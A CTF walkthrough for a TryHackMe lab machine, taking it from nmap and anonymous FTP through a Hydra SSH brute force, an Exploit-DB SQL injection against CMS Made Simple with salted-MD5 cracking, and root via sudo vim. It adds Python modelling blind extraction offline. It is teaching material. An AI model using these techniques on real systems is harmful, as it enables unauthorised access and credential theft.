Simple CTF - writeup by sahildari

This Simple CTF was created by . Kudos to them for creating this beginner-level CTF!

Follow along with me and join the room - https://tryhackme.com/room/easyctf

Questions:


Solution phase:

NMAP AGGRESSIVE SCAN

The very first thing I did was an aggressive nmap scan. The reason for an aggressive scan (-A turns on OS detection, version detection, the default NSE scripts and traceroute) is that it gets us as much information as possible about the open ports and the services running on the target machine. -p- scans all 65535 TCP ports, -T4 speeds up the timing and -oN saves the output in normal format so we can refer back to it.

nmap -A -p- -T4 -oN nmapinitial 10.10.36.207

Our nmap scan shows a total of 3 open ports, i.e. 21 (FTP), 80 (HTTP) and 2222 (SSH, on a non-standard port).

The nmap output gives the answers to the first two questions, #1 and #2.

The nmap scan also tells us that the FTP server allows anonymous login (the ftp-anon NSE script reports it), so we connect and log in as anonymous with any password:

ftp machine_IP

The file we get from anonymous FTP is ForMitch.txt (ls to list it, then get ForMitch.txt to download it):

cat ForMitch.txt

So we know there may be a user mitch whose password is very weak. That's interesting!

Hydra will do the online password guessing against SSH for us. Since SSH is on port 2222 rather than 22, the port goes into the target URI (-l gives the single username to try, -P the wordlist):

hydra -l mitch -P /usr/share/dirb/wordlists/others/best110.txt ssh://machine_IP:2222


This gives us Mitch's password and answers Question #5.

Next we look at the web application running on port 80 (HTTP). Navigating to the machine IP in a browser, we are presented with the default Apache page, so the real content must live somewhere else.

From here we use gobuster and/or dirbuster to find the available directories:

gobuster dir -u http://machine_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -o gobuster.log

gobuster found the /simple directory. Navigating to /simple, we find CMS Made Simple running.


The CMS Made Simple version is 2.2.8.

Using searchsploit to look for available exploits for CMS Made Simple 2.2.8:

searchsploit CMS made simple 2.2.8 

To answer Question #3 we run searchsploit 46635 --examine | grep CVE, which pulls the CVE identifier out of the header comment of the exploit file.


So we have found the exploit; let's try it. Copy it to our working directory (searchsploit -m 46635 mirrors it into the current directory), rename it sqli.py, and run it.


python sqli.py -u http://machine_IP/simple --crack -w /usr/share/dirb/wordlists/others/best110.txt

The -u option points at the CMS install, --crack tells the script to try to crack the recovered password hash, and -w gives it the wordlist to use. Running the exploit may give an error that the termcolor module is not found; fix it with pip install termcolor (use the pip that belongs to the Python interpreter the script runs under).

After the exploit finishes we get the username and the password hash from the database, and with --crack the password in clear text as well.
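To show what the exploit is actually doing in those two stages, here is an added example (my own code, not the exploit from Exploit-DB or anything from the original writeup). It models the blind extraction as a yes/no oracle of the same kind the exploit's time-based queries ask ("is the byte at this position greater than n?", answered by whether the response was delayed) and narrows each byte by binary search, then reproduces the --crack step, which hashes each wordlist entry as md5(sitemask + password), the scheme CMS Made Simple uses for stored passwords. The salt, wordlist, target hash and the username "mitch" fed to the simulated oracle are constructed for this example and are not values from the CTF machine; the oracle itself is an in-memory stand-in so the search logic runs offline.

```python
import hashlib

# --- Stage 1: blind extraction -------------------------------------------
# The SQLi is blind: the page content does not change, but a conditional
# SLEEP() in the injected query makes the response slow when the condition
# holds. The exploit asks "is ASCII(SUBSTRING(value, pos, 1)) > n?" over and
# over and narrows n by binary search, one character at a time. We model that
# question as an oracle callable so the search can be run without a server.

def make_simulated_oracle(secret):
    """Constructed stand-in for the timing side channel. Returns True when the
    byte at 1-based position pos of secret is greater than n (0 past the end),
    just as the real oracle returns True when the response took longer than
    the injected SLEEP()."""
    def oracle(pos, n):
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > n
    return oracle


def extract_blind(oracle, max_len=32):
    """Recover a string byte by byte with about 7 oracle queries per byte
    (binary search over 0..127), stopping at the first NUL (end of value)."""
    recovered = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):   # byte at pos is > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                # SUBSTRING past the end returns '' -> ASCII 0
            break
        recovered.append(chr(lo))
    return "".join(recovered)


# --- Stage 2: cracking the salted hash -----------------------------------
# CMS Made Simple stores user passwords as md5(sitemask + password), where
# sitemask is a per-site salt kept in the siteprefs table. The --crack option
# recovers the salt with the same SQLi and then hashes every wordlist entry.
# SALT, WORDLIST and TARGET_HASH are constructed for this example.
SALT = "1dac0d92e9fa6bb2"
WORDLIST = ["password\n", "letmein\n", "secret\n", "sunshine\n", "welcome1\n"]
TARGET_HASH = hashlib.md5((SALT + "secret").encode()).hexdigest()


def crack_salted_md5(target_hash, salt, wordlist):
    """Return the wordlist entry whose md5(salt + entry) equals target_hash,
    or None if no entry matches."""
    target_hash = target_hash.lower().strip()
    for word in wordlist:
        candidate = word.rstrip("\r\n")          # wordlist files carry newlines
        digest = hashlib.md5((salt + candidate).encode()).hexdigest()
        if digest == target_hash:
            return candidate
    return None


if __name__ == "__main__":
    username = extract_blind(make_simulated_oracle("mitch"))
    print("extracted username:", username)
    print("cracked password:", crack_salted_md5(TARGET_HASH, SALT, WORDLIST))
```

Against a live target the oracle would wrap an HTTP request and compare the elapsed time with the SLEEP() delay; the binary search and the cracking loop stay the same, which is why a wordlist of a hundred entries is enough here: the salt is known, so each guess costs one MD5 and no network round trip.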


The answer to Question #6 is now obvious: we can log in to SSH with the credentials we found.

ssh mitch@machine_IP -p 2222

We have logged in with Mitch's credentials. I'll upgrade the shell here for my convenience with the command bash -i

We have found the user flag, which is the answer to Question #7.

To answer the next question, #8, we navigate to the /home directory to see the other user:

cd /home && ls


We are walking towards the end of this CTF and have only two questions left. For the second-last question, #9, we use sudo -l to view what we are allowed to run with sudo.

Great news: we can run vim with root privileges. Because sudo runs vim as root, anything executed from inside vim runs as root too, so we open it with sudo vim and type :!/bin/bash on vim's command line (or in one go, sudo vim -c ':!/bin/bash') to spawn a root shell.

After that we have a root shell on the machine, and the root flag answers the last question.


I hope you learnt something new with this writeup. 

Happy Hunting
